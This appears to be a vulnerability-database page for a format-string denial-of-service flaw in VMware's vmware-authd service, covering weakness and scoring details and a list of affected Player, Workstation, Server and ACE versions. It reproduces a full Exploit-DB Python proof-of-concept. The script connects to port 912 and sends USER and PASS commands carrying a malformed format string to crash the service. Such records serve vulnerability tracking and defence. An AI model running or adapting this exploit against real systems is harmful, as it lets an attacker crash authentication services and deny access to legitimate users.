Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-134 |
Use of Externally-Controlled Format String The product uses a function that accepts a format string as an argument, but the format string originates from an external source. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 33271
Publication date : 2009-10-06 22h00 +00:00
Author : shinnai
EDB Verified : Yes
source: https://www.securityfocus.com/bid/36630/info
VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input.
An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.
NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue.
# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------
# usage: C:\>exploit.py 127.0.0.1 912
import socket
import time
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect((host, port))
d = s.recv(1024)
print "Server <- " + d
s.send('USER \x25\xFF \r\n')
print 'Sending command "USER" + evil string...'
d = s.recv(1024)
print "Server response <- " + d
s.send('PASS \x25\xFF \r\n')
print 'Sending command "PASS" + evil string...'
try:
d = s.recv(1024)
print "Server response <- " + d
except:
print "\nExploit completed..."
except:
print "Something goes wrong honey..."
Products Mentioned
Configuraton 0
Vmware>>Ace >> Version 2.5.0
Vmware>>Ace >> Version 2.5.1
Vmware>>Ace >> Version 2.5.2
Vmware>>Ace >> Version 2.5.3
Vmware>>Ace >> Version 2.5.4
Vmware>>Ace >> Version 2.6
Vmware>>Ace >> Version 2.6.1
Vmware>>Player >> Version 2.5
Vmware>>Player >> Version 2.5.1
Vmware>>Player >> Version 2.5.2
Vmware>>Player >> Version 2.5.3
Vmware>>Player >> Version 2.5.4
Vmware>>Player >> Version 3.0
Vmware>>Player >> Version 3.0.1
Vmware>>Server >> Version 2.0.0
Vmware>>Server >> Version 2.0.1
Vmware>>Server >> Version 2.0.2
Vmware>>Workstation >> Version 6.5.0
Vmware>>Workstation >> Version 6.5.1
Vmware>>Workstation >> Version 6.5.2
Vmware>>Workstation >> Version 6.5.3
Vmware>>Workstation >> Version 6.5.4
Vmware>>Workstation >> Version 7.0
Vmware>>Workstation >> Version 7.0.1
References